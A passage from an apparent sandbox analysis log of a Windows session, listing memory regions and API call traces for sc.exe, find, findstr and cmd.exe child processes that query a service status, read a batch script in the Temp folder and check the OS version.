0x7ffbed13afff monitored = 0 entry_point = 0x7ffbed0f38b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1039 start_va = 0x1d3be870000 end_va = 0x1d3be876fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001d3be870000" filename = "" Region: id = 1040 start_va = 0x1d3be900000 end_va = 0x1d3be9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001d3be900000" filename = "" Region: id = 1041 start_va = 0x1d3be880000 end_va = 0x1d3be891fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 41 os_tid = 0x1398 [0175.006] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff621e70000 [0175.006] __set_app_type (_Type=0x1) [0175.006] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff621e72340) returned 0x0 [0175.006] __wgetmainargs (in: _Argc=0x7ff621e81028, _Argv=0x7ff621e81030, _Env=0x7ff621e81038, _DoWildCard=0, _StartInfo=0x7ff621e81044 | out: _Argc=0x7ff621e81028, _Argv=0x7ff621e81030, _Env=0x7ff621e81038) returned 0 [0175.007] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.013] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0175.013] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0175.013] wcsncmp (_String1="qu", _String2="\\\\", _MaxCount=0x2) returned 21 [0175.013] _wcsicmp (_String1="query", _String2="query") returned 0 [0175.013] LocalAlloc (uFlags=0x0, uBytes=0x1000) returned 0x1d3be9057f0 [0175.014] ResolveDelayLoadedAPI () returned 0x7ffbed0e6700 [0175.017] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x1d3be90a030 [0175.025] OpenServiceW (hSCManager=0x1d3be90a030, lpServiceName="Null", dwDesiredAccess=0x4) returned 0x1d3be909e20 [0175.026] ResolveDelayLoadedAPI () returned 0x7ffbed0e5ab0 [0175.026] QueryServiceStatus (in: hService=0x1d3be909e20, lpServiceStatus=0x1d3be9057f0 | out: lpServiceStatus=0x1d3be9057f0*(dwServiceType=0x1, dwCurrentState=0x4, dwControlsAccepted=0x1, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0175.029] _ultow (in: _Dest=0x1, _Radix=1363671960 | out: _Dest=0x1) returned="1" [0175.029] _ultow (in: _Dest=0x4, _Radix=1363672080 | out: _Dest=0x4) returned="4" [0175.029] _ultow (in: _Dest=0x0, _Radix=1363672008 | out: _Dest=0x0) returned="0" [0175.029] _ultow (in: _Dest=0x0, _Radix=1363671888 | out: _Dest=0x0) returned="0" [0175.029] _ultow (in: _Dest=0x0, _Radix=1363672056 | out: _Dest=0x0) returned="0" [0175.029] _ultow (in: _Dest=0x0, _Radix=1363671912 | out: _Dest=0x0) returned="0" [0175.029] _ultow (in: _Dest=0x0, _Radix=1363671936 | out: _Dest=0x0) returned="0" [0175.029] _ultow (in: _Dest=0x0, _Radix=1363671984 | out: _Dest=0x0) returned="0" [0175.029] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x2f, dwLanguageId=0x0, lpBuffer=0x5e5147faa8, nSize=0x2, Arguments=0x5e5147fac0 | out: lpBuffer="툰뺐Ǔ") returned 0x151 [0175.033] GetFileType (hFile=0x24) returned 0x3 [0175.033] LocalAlloc (uFlags=0x0, uBytes=0x2a2) returned 0x1d3be90d4f0 [0175.033] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nSERVICE_NAME: Null \r\n TYPE : 1 KERNEL_DRIVER \r\n STATE : 4 RUNNING \r\n (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)\r\n WIN32_EXIT_CODE : 0 (0x0)\r\n SERVICE_EXIT_CODE : 0 (0x0)\r\n CHECKPOINT : 0x0\r\n WAIT_HINT : 0x0\r\n", cchWideChar=337, lpMultiByteStr=0x1d3be90d4f0, cbMultiByte=674, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nSERVICE_NAME: Null \r\n TYPE : 1 KERNEL_DRIVER \r\n STATE : 4 RUNNING \r\n (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)\r\n WIN32_EXIT_CODE : 0 (0x0)\r\n SERVICE_EXIT_CODE : 0 (0x0)\r\n CHECKPOINT : 0x0\r\n WAIT_HINT : 0x0\r\n", lpUsedDefaultChar=0x0) returned 337 [0175.033] WriteFile (in: hFile=0x24, lpBuffer=0x1d3be90d4f0*, nNumberOfBytesToWrite=0x151, lpNumberOfBytesWritten=0x5e5147faa0, lpOverlapped=0x0 | out: lpBuffer=0x1d3be90d4f0*, lpNumberOfBytesWritten=0x5e5147faa0*=0x151, lpOverlapped=0x0) returned 1 [0175.033] LocalFree (hMem=0x1d3be90d4f0) returned 0x0 [0175.033] LocalFree (hMem=0x1d3be90d230) returned 0x0 [0175.034] LocalFree (hMem=0x1d3be9057f0) returned 0x0 [0175.034] CloseServiceHandle (hSCObject=0x1d3be909e20) returned 1 [0175.035] CloseServiceHandle (hSCObject=0x1d3be90a030) returned 1 [0175.036] LocalFree (hMem=0x0) returned 0x0 [0175.036] exit (_Code=0) Thread: id = 44 os_tid = 0x13ac Process: id = "6" image_name = "find.exe" filename = "c:\\windows\\system32\\find.exe" page_root = "0x2da3f000" os_pid = "0x1328" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x9e4" cmd_line = "find /i \"RUNNING\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ff75" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1002 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1003 start_va = 0x30dcd70000 end_va = 0x30dcdeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000030dcd70000" filename = "" Region: id = 1004 start_va = 0x30dce00000 end_va = 0x30dcffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000030dce00000" filename = "" Region: id = 1005 start_va = 0x13e1ccd0000 end_va = 0x13e1cceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000013e1ccd0000" filename = "" Region: id = 1006 start_va = 0x13e1ccf0000 end_va = 0x13e1cd04fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000013e1ccf0000" filename = "" Region: id = 1007 start_va = 0x13e1cd10000 end_va = 0x13e1cd13fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000013e1cd10000" filename = "" Region: id = 1008 start_va = 0x13e1cd20000 end_va = 0x13e1cd20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000013e1cd20000" filename = "" Region: id = 1009 start_va = 0x13e1cd30000 end_va = 0x13e1cd31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000013e1cd30000" filename = "" Region: id = 1010 start_va = 0x7df5ff8d0000 end_va = 0x7ff5ff8cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff8d0000" filename = "" Region: id = 1011 start_va = 0x7ff6232d0000 end_va = 0x7ff6232f2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6232d0000" filename = "" Region: id = 1012 start_va = 0x7ff6242d0000 end_va = 0x7ff6242d8fff monitored = 0 entry_point = 0x7ff6242d2380 region_type = mapped_file name = "find.exe" filename = "\\Windows\\System32\\find.exe" (normalized: "c:\\windows\\system32\\find.exe") Region: id = 1013 start_va = 0x7ffbed960000 end_va = 0x7ffbedb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1019 start_va = 0x13e1cd40000 end_va = 0x13e1ceaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000013e1cd40000" filename = "" Region: id = 1020 start_va = 0x7ffbed570000 end_va = 0x7ffbed61cfff monitored = 0 entry_point = 0x7ffbed5881a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1021 start_va = 0x7ffbea3c0000 end_va = 0x7ffbea5a7fff monitored = 0 entry_point = 0x7ffbea3eba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1022 start_va = 0x13e1ccd0000 end_va = 0x13e1ccdffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000013e1ccd0000" filename = "" Region: id = 1023 start_va = 0x7ff6231d0000 end_va = 0x7ff6232cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6231d0000" filename = "" Region: id = 1025 start_va = 0x13e1ceb0000 end_va = 0x13e1cf6dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1026 start_va = 0x7ffbed880000 end_va = 0x7ffbed91cfff monitored = 0 entry_point = 0x7ffbed8878a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1027 start_va = 0x30dd000000 end_va = 0x30dd07ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000030dd000000" filename = "" Region: id = 1028 start_va = 0x7ffbe1690000 end_va = 0x7ffbe16c1fff monitored = 0 entry_point = 0x7ffbe169d480 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 1029 start_va = 0x13e1cf70000 end_va = 0x13e1d0effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000013e1cf70000" filename = "" Region: id = 1030 start_va = 0x13e1cce0000 end_va = 0x13e1cce6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000013e1cce0000" filename = "" Region: id = 1031 start_va = 0x13e1cd40000 end_va = 0x13e1cd46fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000013e1cd40000" filename = "" Region: id = 1032 start_va = 0x13e1cdb0000 end_va = 0x13e1ceaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000013e1cdb0000" filename = "" Region: id = 1042 start_va = 0x7ffbe1860000 end_va = 0x7ffbe186dfff monitored = 0 entry_point = 0x7ffbe18645b0 region_type = mapped_file name = "fsutilext.dll" filename = "\\Windows\\System32\\fsutilext.dll" (normalized: "c:\\windows\\system32\\fsutilext.dll") Region: id = 1043 start_va = 0x13e1d0f0000 end_va = 0x13e1d426fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1044 start_va = 0x13e1cd50000 end_va = 0x13e1cd92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ulib.dll.mui" filename = "\\Windows\\System32\\en-US\\ulib.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\ulib.dll.mui") Thread: id = 42 os_tid = 0x1394 Thread: id = 43 os_tid = 0x13a0 Process: id = "7" image_name = "findstr.exe" filename = "c:\\windows\\system32\\findstr.exe" page_root = "0x2db56000" os_pid = "0x13b0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x9e4" cmd_line = "findstr /v \"$\" \"MAS_15344413.cmd\" " cur_dir = "C:\\Windows\\Temp\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ff75" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1045 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1046 start_va = 0x3ec4a80000 end_va = 0x3ec4afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000003ec4a80000" filename = "" Region: id = 1047 start_va = 0x3ec4c00000 end_va = 0x3ec4dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000003ec4c00000" filename = "" Region: id = 1048 start_va = 0x19f94b70000 end_va = 0x19f94b8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019f94b70000" filename = "" Region: id = 1049 start_va = 0x19f94b90000 end_va = 0x19f94ba4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019f94b90000" filename = "" Region: id = 1050 start_va = 0x19f94bb0000 end_va = 0x19f94bb3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019f94bb0000" filename = "" Region: id = 1051 start_va = 0x19f94bc0000 end_va = 0x19f94bc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019f94bc0000" filename = "" Region: id = 1052 start_va = 0x19f94bd0000 end_va = 0x19f94bd1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019f94bd0000" filename = "" Region: id = 1053 start_va = 0x7df5ff030000 end_va = 0x7ff5ff02ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff030000" filename = "" Region: id = 1054 start_va = 0x7ff67be80000 end_va = 0x7ff67bea2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67be80000" filename = "" Region: id = 1055 start_va = 0x7ff67bec0000 end_va = 0x7ff67bed6fff monitored = 0 entry_point = 0x7ff67bec57f0 region_type = mapped_file name = "findstr.exe" filename = "\\Windows\\System32\\findstr.exe" (normalized: "c:\\windows\\system32\\findstr.exe") Region: id = 1056 start_va = 0x7ffbed960000 end_va = 0x7ffbedb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1057 start_va = 0x19f94be0000 end_va = 0x19f94d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019f94be0000" filename = "" Region: id = 1058 start_va = 0x7ffbed570000 end_va = 0x7ffbed61cfff monitored = 0 entry_point = 0x7ffbed5881a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1059 start_va = 0x7ffbea3c0000 end_va = 0x7ffbea5a7fff monitored = 0 entry_point = 0x7ffbea3eba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1060 start_va = 0x19f94b70000 end_va = 0x19f94b7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019f94b70000" filename = "" Region: id = 1061 start_va = 0x7ff67bd80000 end_va = 0x7ff67be7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67bd80000" filename = "" Region: id = 1062 start_va = 0x19f94be0000 end_va = 0x19f94c9dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1063 start_va = 0x19f94ca0000 end_va = 0x19f94d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019f94ca0000" filename = "" Region: id = 1064 start_va = 0x7ffbed880000 end_va = 0x7ffbed91cfff monitored = 0 entry_point = 0x7ffbed8878a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1065 start_va = 0x3ec4b00000 end_va = 0x3ec4b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000003ec4b00000" filename = "" Region: id = 1066 start_va = 0x19f94da0000 end_va = 0x19f94e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019f94da0000" filename = "" Region: id = 1067 start_va = 0x19f94b80000 end_va = 0x19f94b86fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019f94b80000" filename = "" Region: id = 1068 start_va = 0x7ffbead60000 end_va = 0x7ffbeaeb5fff monitored = 0 entry_point = 0x7ffbead6a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1069 start_va = 0x7ffbeb9f0000 end_va = 0x7ffbebb75fff monitored = 0 entry_point = 0x7ffbeba3ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1070 start_va = 0x19f94da0000 end_va = 0x19f94dd8fff monitored = 0 entry_point = 0x19f94da12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1071 start_va = 0x19f94e80000 end_va = 0x19f94e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019f94e80000" filename = "" Region: id = 1072 start_va = 0x19f94e90000 end_va = 0x19f95017fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019f94e90000" filename = "" Region: id = 1073 start_va = 0x7ffbed920000 end_va = 0x7ffbed95afff monitored = 0 entry_point = 0x7ffbed9212f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1074 start_va = 0x19f94da0000 end_va = 0x19f94da2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "findstr.exe.mui" filename = "\\Windows\\System32\\en-US\\findstr.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\findstr.exe.mui") Region: id = 1075 start_va = 0x19f95020000 end_va = 0x19f951a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019f95020000" filename = "" Region: id = 1076 start_va = 0x19f951b0000 end_va = 0x19f965affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019f951b0000" filename = "" Region: id = 1077 start_va = 0x19f94db0000 end_va = 0x19f94db0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019f94db0000" filename = "" Region: id = 1078 start_va = 0x19f94dc0000 end_va = 0x19f94dc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000019f94dc0000" filename = "" Region: id = 1079 start_va = 0x19f94dd0000 end_va = 0x19f94e3dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mas_15344413.cmd" filename = "\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd") Thread: id = 45 os_tid = 0xcbc Thread: id = 46 os_tid = 0x1354 Process: id = "8" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x2db65000" os_pid = "0x678" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x9e4" cmd_line = "C:\\Windows\\system32\\cmd.exe /c ver" cur_dir = "C:\\Windows\\System32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ff75" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1081 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1082 start_va = 0x7331660000 end_va = 0x733175ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000007331660000" filename = "" Region: id = 1083 start_va = 0x7331800000 end_va = 0x73319fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000007331800000" filename = "" Region: id = 1084 start_va = 0x24da2b30000 end_va = 0x24da2b4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024da2b30000" filename = "" Region: id = 1085 start_va = 0x24da2b50000 end_va = 0x24da2b64fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024da2b50000" filename = "" Region: id = 1086 start_va = 0x24da2b70000 end_va = 0x24da2b73fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024da2b70000" filename = "" Region: id = 1087 start_va = 0x24da2b80000 end_va = 0x24da2b80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024da2b80000" filename = "" Region: id = 1088 start_va = 0x24da2b90000 end_va = 0x24da2b91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024da2b90000" filename = "" Region: id = 1089 start_va = 0x7df5ff8d0000 end_va = 0x7ff5ff8cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff8d0000" filename = "" Region: id = 1090 start_va = 0x7ff7bd040000 end_va = 0x7ff7bd062fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7bd040000" filename = "" Region: id = 1091 start_va = 0x7ff7bd6f0000 end_va = 0x7ff7bd749fff monitored = 1 entry_point = 0x7ff7bd7053f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 1092 start_va = 0x7ffbed960000 end_va = 0x7ffbedb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1093 start_va = 0x24da2ba0000 end_va = 0x24da2e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024da2ba0000" filename = "" Region: id = 1094 start_va = 0x7ffbed570000 end_va = 0x7ffbed61cfff monitored = 0 entry_point = 0x7ffbed5881a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1095 start_va = 0x7ffbea3c0000 end_va = 0x7ffbea5a7fff monitored = 0 entry_point = 0x7ffbea3eba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1096 start_va = 0x24da2b30000 end_va = 0x24da2b3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024da2b30000" filename = "" Region: id = 1097 start_va = 0x7ff7bcf40000 end_va = 0x7ff7bd03ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7bcf40000" filename = "" Region: id = 1098 start_va = 0x24da2ba0000 end_va = 0x24da2c5dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1099 start_va = 0x24da2d80000 end_va = 0x24da2e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024da2d80000" filename = "" Region: id = 1100 start_va = 0x7ffbed880000 end_va = 0x7ffbed91cfff monitored = 0 entry_point = 0x7ffbed8878a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1101 start_va = 0x7331a00000 end_va = 0x7331afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000007331a00000" filename = "" Region: id = 1102 start_va = 0x24da2e80000 end_va = 0x24da302ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024da2e80000" filename = "" Region: id = 1103 start_va = 0x24da2b40000 end_va = 0x24da2b46fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024da2b40000" filename = "" Region: id = 1104 start_va = 0x24da2c60000 end_va = 0x24da2c66fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024da2c60000" filename = "" Region: id = 1105 start_va = 0x24da2c70000 end_va = 0x24da2c90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Thread: id = 48 os_tid = 0xd74 [0175.898] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff7bd6f0000 [0175.898] __set_app_type (_Type=0x1) [0175.898] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff7bd705700) returned 0x0 [0175.898] __getmainargs (in: _Argc=0x7ff7bd720108, _Argv=0x7ff7bd720110, _Env=0x7ff7bd720118, _DoWildCard=0, _StartInfo=0x7ff7bd720124 | out: _Argc=0x7ff7bd720108, _Argv=0x7ff7bd720110, _Env=0x7ff7bd720118) returned 0 [0175.899] GetCurrentThreadId () returned 0xd74 [0175.899] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd74) returned 0x6c [0175.899] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ffbed570000 [0175.899] GetProcAddress (hModule=0x7ffbed570000, lpProcName="SetThreadUILanguage") returned 0x7ffbed593270 [0175.899] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.902] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0175.902] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x733175f988 | out: phkResult=0x733175f988*=0x0) returned 0x2 [0175.902] VirtualQuery (in: lpAddress=0x733175f974, lpBuffer=0x733175f8f0, dwLength=0x30 | out: lpBuffer=0x733175f8f0*(BaseAddress=0x733175f000, AllocationBase=0x7331660000, AllocationProtect=0x4, __alignment1=0xfffff803, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xffff8000)) returned 0x30 [0175.902] VirtualQuery (in: lpAddress=0x7331660000, lpBuffer=0x733175f8f0, dwLength=0x30 | out: lpBuffer=0x733175f8f0*(BaseAddress=0x7331660000, AllocationBase=0x7331660000, AllocationProtect=0x4, __alignment1=0xfffff803, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0xffff8000)) returned 0x30 [0175.902] VirtualQuery (in: lpAddress=0x7331661000, lpBuffer=0x733175f8f0, dwLength=0x30 | out: lpBuffer=0x733175f8f0*(BaseAddress=0x7331661000, AllocationBase=0x7331660000, AllocationProtect=0x4, __alignment1=0xfffff803, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0xffff8000)) returned 0x30 [0175.902] VirtualQuery (in: lpAddress=0x7331664000, lpBuffer=0x733175f8f0, dwLength=0x30 | out: lpBuffer=0x733175f8f0*(BaseAddress=0x7331664000, AllocationBase=0x7331660000, AllocationProtect=0x4, __alignment1=0xfffff803, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xffff8000)) returned 0x30 [0175.902] VirtualQuery (in: lpAddress=0x7331760000, lpBuffer=0x733175f8f0, dwLength=0x30 | out: lpBuffer=0x733175f8f0*(BaseAddress=0x7331760000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0xfffff803, RegionSize=0xa0000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0xffff8000)) returned 0x30 [0175.902] GetConsoleOutputCP () returned 0x1b5 [0175.903] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0175.903] 